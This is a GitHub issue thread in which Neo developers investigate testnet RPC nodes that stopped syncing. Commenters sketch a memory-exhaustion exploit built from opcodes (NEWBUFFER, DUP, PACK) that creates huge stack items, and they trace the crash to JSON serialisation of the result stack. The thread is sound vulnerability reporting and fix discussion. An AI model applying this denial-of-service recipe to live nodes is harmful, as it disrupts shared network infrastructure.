-
Notifications
You must be signed in to change notification settings - Fork 1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
all RPC nodes on testnet stopped syncing maybe caused by some modules #2666
Comments
curl http://seed5t4.neo.org:20332 -d '{
"jsonrpc": "2.0",
"id": 1,
"method": "getblockcount",
"params": [
"0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
]
}'
They all now stuck at 1245636. |
|
It should be a bug from |
the script is:
|
Based on @dusmart 's exploit, construct a new exploit that requires 1024 GB of memory: newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup
This script consumes incredible amount of memorys. oom on my 64GB memory machine. |
I think the root cause is we only consider the cpu usage ignoring memory cost when set OpCode price. |
There is StackItem size limit https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39 |
@ZhangTao1596 Nop, i checked the code, no size check under the Just create 1024 1MB buffers, then pack them together,,,,,,, Similar Opcodes that can bypass the size limitation: PACKMAP |
@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter. |
@ZhangTao1596 The BTW, to answer your question, packed items are remoted from ReferenceCounter, /// <summary>
/// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
/// </summary>
public uint MaxStackSize { get; init; } = 2 * 1024; |
By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But there comes a memory leak at json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems))); if the script is called through RPC. var txJson = TxLogToJson(appExec); in plugin trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray(); can lead to memory leak. |
We have to limit the items in the ResultStack in ApplicationLogs. |
NeoGo has no problem with this:
So our nodes never stopped and worked just fine.
But this script breaks the node, so it should be investigated. |
And it's all purely JSONization issue, the script itself runs fine and does not consume a lot of memory as @Hecate2 already noticed, but an attempt to make a JSON out of it does. |
I think we'll just limit the JSON size. We have two ways to JSONize stack items, one is used for StdLib's |
I don't think it differs a lot from the previous one, it'll all be fixed by nspcc-dev/neo-go#2386. |
I think this one was solved quite a while ago and can be closed now. |
Describe the bug
Accidentally, we constructed a tx that leaves lots of large
StackItems
on Result Stack. After sending that, all seed nodes stopped syncing.To Reproduce
Expected behavior
All nodes go well.
Screenshots
(Optional) Additional context
We suspect that this is caused by some neo modules.
The text was updated successfully, but these errors were encountered: